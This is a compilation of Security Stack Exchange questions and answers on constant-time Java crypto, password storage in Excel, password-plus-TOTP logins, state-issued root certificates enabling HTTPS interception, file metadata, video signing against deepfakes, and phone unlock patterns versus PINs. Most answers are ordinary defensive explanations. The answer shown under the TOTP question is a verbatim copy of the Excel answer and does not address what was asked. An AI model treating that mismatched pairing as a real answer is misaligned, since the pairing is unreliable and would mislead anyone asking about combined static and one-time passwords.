When you are working with secret keys, if your code branches unequally it could reveal bits of the secret keys via side channels. So for some algorithms it should branch uniformly independently of the secret key. On C/C++/Rust, you can use assembly to be sure that no compiler optimizations will mess with the branching. However, on Java, the situation is difficult. First of all, it does JIT for desktop, and AOT on Android, so there are 2 possibilities for the code to be optimized in an unpredictable way, as JIT and AOT are always changing and can be different for each device. So, how are side channel attacks that take advantage of branching prevented on Java?
While you can make some attempt towards constant-time code in general purpose JITed languages like Java, you generally run into some problems: The runtime implementation is, generally, intended to be transparent to the code that is running on top of it, and therefore does not provide strong guarantees about timing behaviour or cache side-channels. If you validate that a Java program generates constant-time results when executed under a particular JRE, there is no guarantee that the timing behaviour will remain unchanged on other JREs or after updates are installed. If you validate that a Java program generates constant-time results when running on a particular architecture, there is no guarantee that the timing behaviour will remain unchanged on other architectures. Assumptions made about the behaviour of runtime library calls may be invalidated after updating the runtime library. The JRE/JIT is a very large and complex system that might have unforeseen behaviours in circumstances that were not identified during development and testing of a constant-time implementation written in Java. The result of this is that you can't really use Java to solve the problem, in most cases. You need to solve it in a way that doesn't depend on JIT behaviour. There are three general approaches here: The runtime library contains one or more constant-time platform-native implementations of the functionality. These are specific to the architecture. The runtime library contains an implementation that provides a shim interface between the Java code and some underlying hardware implementation of the functionality (e.g. if you're running Java on an ARM SoC and that processor has a cryptographic coprocessor or HSM). An implementation is written in a different language that allows for constant-time guarantees, which the Java code can then call into using JNI. These approaches allow for the constant-time parts to be made and maintained more easily. One final approach that isn't really relevant in the general case, but does come up in some specific circumstances (e.g. Java smartcards), is the use of a custom runtime and JIT/AOT that provides extra controls and guarantees that allow for these algorithms to be implemented directly in Java, albeit with some extra development overhead and (usually) a much more constrained environment.
{ "source": [ "https://security.stackexchange.com/questions/260130", "https://security.stackexchange.com", "https://security.stackexchange.com/users/158391/" ] }
260,169
Basically the title. For example, how bad is it to store passwords in an Excel sheet protected with a password, instead of storing passwords in Keypass or something else like Zoho Vault? Of course, this sheet would be in a safe place as well: besides the password to open the sheet, an attacker would need the password to access the Google Drive account and a second factor authentication token from Google.
No. At best, password-encrypted Excel sheets are only protected at rest, not while opened. At worst, it's not encrypted and/or an adversary can use one of several documented MS office password recovery attacks . It is unwise to assume that Excel's protections have anywhere near as much security vetting as any password manager , especially not the better-established ones like Bitwarden and 1Password . In addition to being vetted for secure password storage, actual password managers include an interface that prevents you from seeing all passwords at the same time. They also have tons of extra features, like options to generate secure passwords, the ability to privately determine if a given password was part of a recent breach, and even the ability to wipe your clipboard a minute after you copy a password to it. See also Wikipedia's List of password managers § Features matrix for a better list of what Excel can't offer but plenty of free options do.
{ "source": [ "https://security.stackexchange.com/questions/260169", "https://security.stackexchange.com", "https://security.stackexchange.com/users/275370/" ] }
260,171
I’m looking for Term Or Some platform for managing Password Authentication with this way : Password construct from 2 Part , First one is static and you can make it and second Part Generate From TOTP System as an example : In 13:00 Jinx password for login Is Abc627028 And in 13:01 Jinx Password for login Is Abc002839 As you can see First part is static and for jinx user always Abc and second Part is dynamic send to Jinx with expiration time I don’t Need to chains , for example first authenticate user with A static password and then ( if static password correctly) send TOTP to it for Second Step Authentication. I don’t what’s that term , some things like Multi Factor Authentication just in One Step.
No. At best, password-encrypted Excel sheets are only protected at rest, not while opened. At worst, it's not encrypted and/or an adversary can use one of several documented MS office password recovery attacks . It is unwise to assume that Excel's protections have anywhere near as much security vetting as any password manager , especially not the better-established ones like Bitwarden and 1Password . In addition to being vetted for secure password storage, actual password managers include an interface that prevents you from seeing all passwords at the same time. They also have tons of extra features, like options to generate secure passwords, the ability to privately determine if a given password was part of a recent breach, and even the ability to wipe your clipboard a minute after you copy a password to it. See also Wikipedia's List of password managers § Features matrix for a better list of what Excel can't offer but plenty of free options do.
{ "source": [ "https://security.stackexchange.com/questions/260171", "https://security.stackexchange.com", "https://security.stackexchange.com/users/166489/" ] }
260,222
My state has made a statement that in case my country will be disconnected from the world's CAs, it is necessary to install its own state certificates . In many forums, information has flashed that in this case, having its own certificate, the state will be able to decrypt all HTTPS traffic. Is it true or not?
Yes, this could enable your state to spy on HTTPS traffic. That's not just an imaginary threat, it happened in the past in a private company and it was attempted by a state . CAs are a centerpiece of a trust system. Once your browser trusts a CA, in this case a state controlled CA, it trusts all the certificates signed by it. Now, your state-controlled ISP could use fake but trusted certificates to intercept traffic to any website, like the BBC or Bellingcat for example, and your browser would not stop it because it would look legitimate. HTTPS is meant to prevent such attacks. Trusting a rogue CA completely breaks HTTPS. This more recent answer by jcaron details this process. Note that technically, it's not the rogue CA that decrypts the traffic. It provides the means for interception by other networks actors to remain undetected by the browsers.
{ "source": [ "https://security.stackexchange.com/questions/260222", "https://security.stackexchange.com", "https://security.stackexchange.com/users/249120/" ] }
260,411
Before uploading a photo or image to a forum, I may typically strip the metadata to remove identifying material with exiftool . The thing is, the Linux file system itself seems to leave some metadata on a file: cardamom@pluto ~ $ ls -la insgesamt 1156736 drwx------ 145 cardamom cardamom 20480 Mär 16 08:58 . drwxr-xr-x 9 root root 4096 Apr 21 2021 .. -rw-r--r-- 1 cardamom cardamom 123624 Mai 24 2018 IMG_20200627_215609.jpg So I feel tempted to change the user and group of a file as well. Is that a good idea? There is always a user called nobody and a group called nogroup who look like they were almost made for the purpose. Is that everything or is there more metadata that Linux is leaving on its files?
the linux file system itself seems to leave some metadata on a file User, group etc are meta data stored in the file system. They are not part of the file and thus will not be included when uploading the file in the browser. This can be different in other data transfer method though. When copying or moving files between local file systems or remote file systems (NFS, SMB, ...), information like user, group and permissions might be transferred. They might also be included when storing the file in archives: some formats like Tar or Cpio include permissions and user and group id or even names.
{ "source": [ "https://security.stackexchange.com/questions/260411", "https://security.stackexchange.com", "https://security.stackexchange.com/users/188449/" ] }
260,536
I saw a news report about now freely available software to make "deepfake" videos. Couldn't videos be internally marked using a private key, so that everyone could verify the originator using a public key? This could be built in to browsers so that everyone could see if something was fake or not. Is it technically possible to mark a video stream throughout with something that can't be spoofed or removed? Then if a video had no mark, we would know it was rubbish.
In theory, yes. Signing a video file with a private key and then publishing the public key is no different than signing some text and then publishing it. But this doesn't really solve the problem. For example, imagine someone filmed a video of me putting on two differently colored socks - which, as we all know, is one of the worst imaginable crimes. The person, who shot the video, signs it with their private key and publishes it. Now I vehemently deny the legitimacy of the video, saying it was obviously faked and I would never wear differently-colored socks. As it turns out, my claim was correct. Someone shot a video of me wearing socks and then modified the video file, to alter the color of one of my socks. He then signed this modified file and published it. As you see from this example, signing a video really doesn't "verify" that the content of the video is "legitimate" in one way or another. In fact... it makes things even worse. "Deep Fakes" are primarily a social problem, meaning that a significant amount of people believe that the content of the video is real, despite it not being so. You cannot fix social problems with technology, as that tends to create even more social problems . By adding a simple green checkmark of "Legitimate" to a video, you essentially teach people not to engage their brains and question what they see, and instead create a shortcut of "checkmark = truth". And while some people might not be fooled by it, keep in mind that propaganda doesn't need to work on everyone, just enough people. In short: The best way to combat deep fakes is to teach people to think critically.
{ "source": [ "https://security.stackexchange.com/questions/260536", "https://security.stackexchange.com", "https://security.stackexchange.com/users/275919/" ] }
260,615
I’ve seen multiple sources online that say that unlock patterns are less safe than ‘random’ PINs. I was thinking; how come? From what I see, they would both be just as secure; you chose different points on a grid, in a certain order, and then it’ll unlock your phone. They just seem different visually. I also understand that it might be easier to see a pattern through marks on a phone screen, but ignoring that, I don’t understand why anything would change. Is there something I’m getting wrong here?
With a PIN, each digit has 10 possibilities, so the total possibilities for N digits is 10^N. With a pattern, each position has at most 8 possibilities (center), or only 5 possibilities (side) if the last one was in the center. Computing the total possibilities is much trickier here, because if you're always returning to the center to get more options then each "return to center" adds no meaningful entropy at all, but it's easy to compute an upper bound: 8^(N/2) * 5^(N/2). In practice a pattern will be worse that that upper bound, though. For N=4, PIN has 10,000 possibilities; pattern has 1,600 (16% as many). For N=6, PIN has 1,000,000 possibilities; pattern has 64,000 (6.4% as many). And remember that the patterns will in practice be worse than that. Furthermore, it may be easier to deduce the unlock pattern from viewing screen smudges. Sometimes the screen area where the PIN pad / swipe pattern is displayed doesn't get used after unlocking, and if the screen was clean enough before, you can figure out a lot. With a PIN, you might figure out the set of numbers used (which will drastically lower the possibilities), but won't know the order. With a pattern, you might literally be able to deduce the entire pattern at a glance (it's possible to tell where a pattern starts and ends, because the fingerprint at the endpoint is less smudged). EDIT: Thank you to the people in the comments who pointed out that the Android pattern rules are much more complicated than I assumed (my bad; I don't use the pattern unlock on anything). Worth noting that the actual rules permit far fewer patterns than the upper bound numbers I gave above. Also, to respond to people pointing out that the maximum guesses barely matter anyway: it may be that you're kind of correct, but for a different reason than you think. The default behavior on Android is (or was as of 2013; I don't know if this has changed) that you have unlimited guesses, just with a 30-second pause every five failed attempts. That's enough to fully brute-force the 4-digit PIN space in under a day, although of course in practice the time is vastly shortened by trying the common PINs first. https://www.theverge.com/2013/7/24/4551962/r2b2-3d-printed-open-source-robot-crack-android-pins (I don't know if the robot could attack swipe patterns, but if so, it would take still less time than PINs, for a given length.) The difference between 20 hours max for a four-digit pin, and 90 days max for a six-digit PIN, is huge... except of course humans are terrible at randomness. Obviously, if anti-brute-forcing measures are in place (which they usually are on business-managed devices but not necessarily personal ones), a PIN or pattern only needs to be strong enough to stymie the permitted number of attempts. This is how four-digit PINs on credit and debit cards achieve a tolerable level of security. Also, ideally devices would do something similar to the current password recommendations, and disallow PINs (or patterns) too commonly used... but in practice, I'm not going to hold my breath for that.
{ "source": [ "https://security.stackexchange.com/questions/260615", "https://security.stackexchange.com", "https://security.stackexchange.com/users/273116/" ] }